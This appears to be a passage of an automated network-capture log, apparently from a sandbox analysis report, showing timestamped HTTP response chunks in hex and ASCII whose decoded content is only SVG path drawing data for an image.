                                                                                                                                                                                                                                                                          Data Ascii: ,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M785.62,269.39a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13948INData Raw: 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                                          Data Ascii: 12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class=
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13964INData Raw: 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 34 37 2e 38 32 2c 32 31 37 2e 38 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M847.82,217.86a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC13980INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 32 35 2c 33 31 33 2e 36 35 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: class="cls-9" d="M882.25,313.65a2.15,2.15,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14316INData Raw: 39 22 20 64 3d 22 4d 39 31 36 2e 36 37 2c 34 30 39 2e 34 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 9" d="M916.67,409.45a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14332INData Raw: 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e
                                                                                                                                                                                                                                                                          Data Ascii: 4,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path>
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14348INData Raw: 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37
                                                                                                                                                                                                                                                                          Data Ascii: a3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67.05,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M49.77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14364INData Raw: 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: 1-4.23-1.19,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14380INData Raw: 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 30 2e 31 32 2c 31 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e
                                                                                                                                                                                                                                                                          Data Ascii: .62"></path><path class="cls-7" d="M110.12,162a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14396INData Raw: 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 39 2e 30 37 2c 32 35 37 2e 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: cls-7" d="M149.07,257.39a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14412INData Raw: 2e 37 38 2c 31 30 37 2e 32 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c
                                                                                                                                                                                                                                                                          Data Ascii: .78,107.24a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:51 UTC14428INData Raw: 37 32 2c 32 30 32 2e 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 72,202.6a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15207INData Raw: 2c 32 39 38 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,298a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15223INData Raw: 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15239INData Raw: 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22
                                                                                                                                                                                                                                                                          Data Ascii: 1,2.83,3.18,3.18,0,0,1-4.22-1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15255INData Raw: 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                          Data Ascii: 19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15271INData Raw: 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c
                                                                                                                                                                                                                                                                          Data Ascii: -4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path cl
                                                                                                                                                                                                                                                                          2023-07-05 06:07:52 UTC15287INData Raw: 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 32 2c 33 34 37 2e 32 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30
